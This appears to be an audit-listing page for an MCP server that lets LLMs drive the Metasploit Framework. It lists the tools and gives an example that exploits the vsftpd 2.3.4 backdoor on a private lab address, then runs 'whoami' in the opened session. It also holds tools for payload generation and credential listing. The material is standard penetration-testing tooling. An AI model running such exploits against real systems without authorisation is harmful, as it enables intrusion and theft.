MCP server for Metasploit Framework via pymetasploit3
SaferSkills independently audited mcp-pymetasploit3 (MCP Server) and scored it 100/100 (green). The audit ran 55 deterministic rules across Security, Supply Chain, Maintenance, Transparency, and Community; it found 0 high-severity and 0 lower-severity findings. The full rule-by-rule trace and per-finding evidence are below. Free, methodology-open.
Findings & checks · 0 flagged
Every scanned point with the score it earned and what moved between them.
First recorded scan — no prior version to compare against.
The primary manifest — the file an agent reads to learn what this artifact does.
MCP server for Metasploit Framework via pymetasploit3. This server exposes all pymetasploit3 functionality as MCP tools, allowing LLMs to interact with Metasploit Framework through the msfrpc protocol.
pip install mcp-pymetasploit3{
"mcpServers": {
"mcp-pymetasploit3": {
"command": "mcp-pymetasploit3",
"env": {}
}
}
}Before using the MCP server, you need to start the Metasploit RPC server:
Using msfrpcd:
msfrpcd -P yourpassword -p 55553 -nUsing msfconsole:
msfconsole -q
msf6 > load msgrpc Pass=yourpasswordOnce connected, the following tools are available:
#### Connection Management
connect - Connect to Metasploit RPC serverdisconnect - Disconnect from RPC serverget_client_info - Get current connection status#### Module Management
list_modules - List available modules by typeuse_module - Load a specific moduleget_module_info - Get module description and infoget_module_options - Get all module optionsset_module_option - Set a module optionget_missing_required - Get required options not setexecute_module - Execute a moduleget_module_targets - Get available targetsset_module_target - Set the targetget_target_payloads - Get compatible payloads#### Payload Generation
generate_payload - Generate a payload#### Session Management
list_sessions - List all active sessionsget_session_info - Get session informationinteract_session - Write/read from sessionsession_run_command - Run command with outputstop_session - Stop a session#### Console Management
create_console - Create a new consoledestroy_console - Destroy a consolewrite_console - Write to consoleread_console - Read console outputconsole_is_busy - Check if console is busyrun_module_output - Execute module and get output#### Core/Framework
get_framework_version - Get framework versioncore_save - Save core statecore_reload_modules - Reload modulescore_set_global - Set global variablecore_unset_global - Unset global variable#### Database
get_db_status - Get database statusdb_list_workspaces - List workspacesdb_set_workspace - Set current workspacedb_list_hosts - List hostsdb_list_services - List servicesdb_list_notes - List notesdb_list_creds - List credentialsdb_list_vulns - List vulnerabilities#### Jobs
list_jobs - List running jobsstop_job - Stop a jobget_job_info - Get job information#### Plugins
list_plugins - List loaded pluginsload_plugin - Load a pluginunload_plugin - Unload a plugin#### Search
search_modules - Search for modulesget_module_references - Get module references# Connect to Metasploit
connect(password="yourpassword", host="127.0.0.1", port=55553, ssl=False)
# List exploits
exploits = list_modules("exploit")
# Use an exploit
use_module("exploit", "unix/ftp/vsftpd_234_backdoor")
# Set options
set_module_option("exploit", "unix/ftp/vsftpd_234_backdoor", "RHOSTS", "192.168.1.100")
# Execute
result = execute_module("exploit", "unix/ftp/vsftpd_234_backdoor", payload="cmd/unix/interact")
# List sessions
sessions = list_sessions()
# Interact with session
output = interact_session("1", "whoami")
# Disconnect
disconnect()git clone https://github.com/daedalus/mcp-pymetasploit3.git
cd mcp-pymetasploit3
pip install -e ".[test]"
# run tests
pytest
# format
ruff format src/ tests/
# lint
ruff check src/ tests/
# type check
mypy src/mcp-name: io.github.daedalus/mcp-pymetasploit3
~30 seconds. Free. No account. Every finding cites a rule and a line of evidence.